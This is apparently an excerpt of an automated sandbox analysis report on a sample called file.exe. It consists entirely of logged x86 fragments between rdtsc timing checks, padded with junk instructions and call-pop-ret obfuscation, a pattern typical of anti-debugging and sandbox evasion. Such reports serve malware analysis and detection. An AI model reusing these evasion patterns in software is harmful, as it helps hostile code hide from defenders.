Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D00A0B second address: D00A23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FF0BCB462BEh 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D00A23 second address: D00A3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jg 00007FF0BC8515D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D00A3B second address: D00A47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 js 00007FF0BCB462B6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D00D96 second address: D00D9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D01F40 second address: D01F44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D039CA second address: D039CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D08042 second address: D0806A instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF0BCB462C5h 0x00000008 jmp 00007FF0BCB462BFh 0x0000000d push eax 0x0000000e pushad 0x0000000f popad 0x00000010 jns 00007FF0BCB462B6h 0x00000016 pop eax 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0806A second address: D08079 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FF0BC8515D6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D08079 second address: D08081 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D08081 second address: D08088 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0C7D5 second address: D0C7F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BCB462C8h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0C7F5 second address: D0C7F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCB8DB second address: CCB8DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0BEB1 second address: D0BED8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007FF0BC8515D6h 0x0000000e jmp 00007FF0BC8515E9h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0BED8 second address: D0BEDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0C4DF second address: D0C4EB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jo 00007FF0BC8515D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0C4EB second address: D0C505 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FF0BCB462C4h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0C6AC second address: D0C6BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BC8515DAh 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0F99D second address: D0F9A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0F9A3 second address: D0F9DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d jl 00007FF0BC8515EEh 0x00000013 jmp 00007FF0BC8515E8h 0x00000018 mov eax, dword ptr [esp+04h] 0x0000001c push eax 0x0000001d push edx 0x0000001e jnl 00007FF0BC8515D8h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0F9DC second address: D0FA32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push edx 0x0000000b jmp 00007FF0BCB462C7h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 jmp 00007FF0BCB462C8h 0x0000001a pop eax 0x0000001b jmp 00007FF0BCB462BDh 0x00000020 push 71AA9882h 0x00000025 pushad 0x00000026 push esi 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D101D1 second address: D101DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FF0BC8515D6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D10B3F second address: D10B43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D10B43 second address: D10B98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007FF0BC8515D8h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 0000001Ah 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 movsx esi, di 0x00000027 xchg eax, ebx 0x00000028 jmp 00007FF0BC8515DAh 0x0000002d push eax 0x0000002e push eax 0x0000002f push edx 0x00000030 push edi 0x00000031 jmp 00007FF0BC8515E6h 0x00000036 pop edi 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D110C7 second address: D110E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FF0BCB462C6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D11B44 second address: D11B48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D11B48 second address: D11B4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D11B4C second address: D11B52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D11B52 second address: D11B58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D11B58 second address: D11B67 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D11B67 second address: D11B71 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF0BCB462B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D12B97 second address: D12B9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D12B9C second address: D12C32 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FF0BCB462BBh 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FF0BCB462C9h 0x00000011 nop 0x00000012 sub dword ptr [ebp+12450062h], eax 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ebx 0x0000001d call 00007FF0BCB462B8h 0x00000022 pop ebx 0x00000023 mov dword ptr [esp+04h], ebx 0x00000027 add dword ptr [esp+04h], 0000001Dh 0x0000002f inc ebx 0x00000030 push ebx 0x00000031 ret 0x00000032 pop ebx 0x00000033 ret 0x00000034 add dword ptr [ebp+122D2626h], esi 0x0000003a jmp 00007FF0BCB462BDh 0x0000003f push 00000000h 0x00000041 mov esi, dword ptr [ebp+122D29CEh] 0x00000047 mov dword ptr [ebp+122D1B9Fh], edx 0x0000004d xchg eax, ebx 0x0000004e push eax 0x0000004f push edx 0x00000050 pushad 0x00000051 pushad 0x00000052 popad 0x00000053 jmp 00007FF0BCB462C5h 0x00000058 popad 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D12C32 second address: D12C38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D12C38 second address: D12C3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D12C3C second address: D12C4E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF0BC8515D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D12C4E second address: D12C52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D135BC second address: D135C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D135C0 second address: D135CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BCB462BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1411E second address: D14128 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF0BC8515D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D13EF6 second address: D13EFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D14128 second address: D14146 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BC8515DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF0BC8515DAh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D15F8F second address: D16007 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop ebx 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b jno 00007FF0BCB462B6h 0x00000011 pop eax 0x00000012 pushad 0x00000013 jp 00007FF0BCB462B6h 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b popad 0x0000001c popad 0x0000001d nop 0x0000001e jmp 00007FF0BCB462BBh 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push ecx 0x00000028 call 00007FF0BCB462B8h 0x0000002d pop ecx 0x0000002e mov dword ptr [esp+04h], ecx 0x00000032 add dword ptr [esp+04h], 00000017h 0x0000003a inc ecx 0x0000003b push ecx 0x0000003c ret 0x0000003d pop ecx 0x0000003e ret 0x0000003f mov si, 3000h 0x00000043 mov edi, dword ptr [ebp+122D1BD6h] 0x00000049 push 00000000h 0x0000004b mov edi, dword ptr [ebp+122D2BD2h] 0x00000051 xchg eax, ebx 0x00000052 jmp 00007FF0BCB462C2h 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a pushad 0x0000005b pushad 0x0000005c popad 0x0000005d push esi 0x0000005e pop esi 0x0000005f popad 0x00000060 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1B286 second address: D1B30E instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF0BC8515DCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jnl 00007FF0BC8515E4h 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007FF0BC8515D8h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 00000017h 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c push 00000000h 0x0000002e jmp 00007FF0BC8515E4h 0x00000033 push 00000000h 0x00000035 jng 00007FF0BC8515DEh 0x0000003b jns 00007FF0BC8515D8h 0x00000041 xchg eax, esi 0x00000042 push ebx 0x00000043 jmp 00007FF0BC8515DDh 0x00000048 pop ebx 0x00000049 push eax 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d jbe 00007FF0BC8515D6h 0x00000053 push edi 0x00000054 pop edi 0x00000055 popad 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1D1EA second address: D1D22E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF0BCB462C0h 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d call 00007FF0BCB462BBh 0x00000012 sub bx, E0F9h 0x00000017 pop edi 0x00000018 push 00000000h 0x0000001a mov bh, ah 0x0000001c push 00000000h 0x0000001e mov edi, dword ptr [ebp+1247C443h] 0x00000024 sbb edi, 6370CED0h 0x0000002a push eax 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e push eax 0x0000002f pop eax 0x00000030 push ecx 0x00000031 pop ecx 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D168B3 second address: D168B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1A434 second address: D1A439 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D193C7 second address: D193D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FF0BC8515D6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1B4BB second address: D1B4C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007FF0BCB462BCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1C4D0 second address: D1C574 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 jmp 00007FF0BC8515E4h 0x0000000c popad 0x0000000d push eax 0x0000000e push ecx 0x0000000f jmp 00007FF0BC8515E7h 0x00000014 pop ecx 0x00000015 nop 0x00000016 push 00000000h 0x00000018 push ecx 0x00000019 call 00007FF0BC8515D8h 0x0000001e pop ecx 0x0000001f mov dword ptr [esp+04h], ecx 0x00000023 add dword ptr [esp+04h], 00000019h 0x0000002b inc ecx 0x0000002c push ecx 0x0000002d ret 0x0000002e pop ecx 0x0000002f ret 0x00000030 push ebx 0x00000031 mov dword ptr [ebp+122D1B9Fh], edi 0x00000037 pop ebx 0x00000038 push dword ptr fs:[00000000h] 0x0000003f xor edi, dword ptr [ebp+122D5416h] 0x00000045 mov dword ptr fs:[00000000h], esp 0x0000004c or edi, 08CF1E95h 0x00000052 mov eax, dword ptr [ebp+122D13B9h] 0x00000058 mov edi, 38BD4E66h 0x0000005d push FFFFFFFFh 0x0000005f push esi 0x00000060 mov ebx, 065370BEh 0x00000065 pop ebx 0x00000066 nop 0x00000067 push eax 0x00000068 push edx 0x00000069 pushad 0x0000006a push edi 0x0000006b pop edi 0x0000006c jmp 00007FF0BC8515DFh 0x00000071 popad 0x00000072 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1F2B6 second address: D1F2F8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push esi 0x0000000b call 00007FF0BCB462B8h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], esi 0x00000015 add dword ptr [esp+04h], 00000019h 0x0000001d inc esi 0x0000001e push esi 0x0000001f ret 0x00000020 pop esi 0x00000021 ret 0x00000022 xor dword ptr [ebp+122D1BA9h], ebx 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c and ebx, 12E9FF50h 0x00000032 xchg eax, esi 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 push ecx 0x00000037 pop ecx 0x00000038 pushad 0x00000039 popad 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1F2F8 second address: D1F31B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BC8515E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1F31B second address: D1F320 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1D3D6 second address: D1D3DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1F467 second address: D1F46D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1F46D second address: D1F476 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2060F second address: D20638 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007FF0BCB462C1h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FF0BCB462BFh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D20638 second address: D2063D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D25452 second address: D25465 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007FF0BCB462B8h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D25465 second address: D25477 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF0BC8515DEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D245FA second address: D24610 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF0BCB462B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c jnp 00007FF0BCB462C0h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D25725 second address: D25729 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D25729 second address: D25769 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BCB462BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ja 00007FF0BCB462C4h 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 jmp 00007FF0BCB462C4h 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D26918 second address: D2691E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2691E second address: D26922 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D31487 second address: D3148B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D31622 second address: D31626 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3179A second address: D317A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FF0BC8515D6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D37B05 second address: D37B26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007FF0BCB462C0h 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D37B26 second address: D37B2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D37B2B second address: D37B30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D37CC0 second address: D37CC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D37CC4 second address: D37CCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D37CCD second address: D37CD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3FA57 second address: D3FA5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3FA5D second address: D3FA62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3FA62 second address: D3FA9F instructions: 0x00000000 rdtsc 0x00000002 je 00007FF0BCB462C4h 0x00000008 jmp 00007FF0BCB462BEh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jg 00007FF0BCB462BCh 0x00000017 jmp 00007FF0BCB462C7h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3FA9F second address: D3FAA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D45676 second address: D4567F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4567F second address: D45683 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D45B10 second address: D45B14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D45B14 second address: D45B6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF0BC8515E6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FF0BC8515E8h 0x00000010 jp 00007FF0BC8515DEh 0x00000016 popad 0x00000017 push eax 0x00000018 je 00007FF0BC8515E2h 0x0000001e jns 00007FF0BC8515D6h 0x00000024 jbe 00007FF0BC8515D6h 0x0000002a push esi 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D465F1 second address: D465F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D465F5 second address: D4661A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jno 00007FF0BC8515D6h 0x0000000d push edi 0x0000000e pop edi 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FF0BC8515E1h 0x00000019 rdtsc
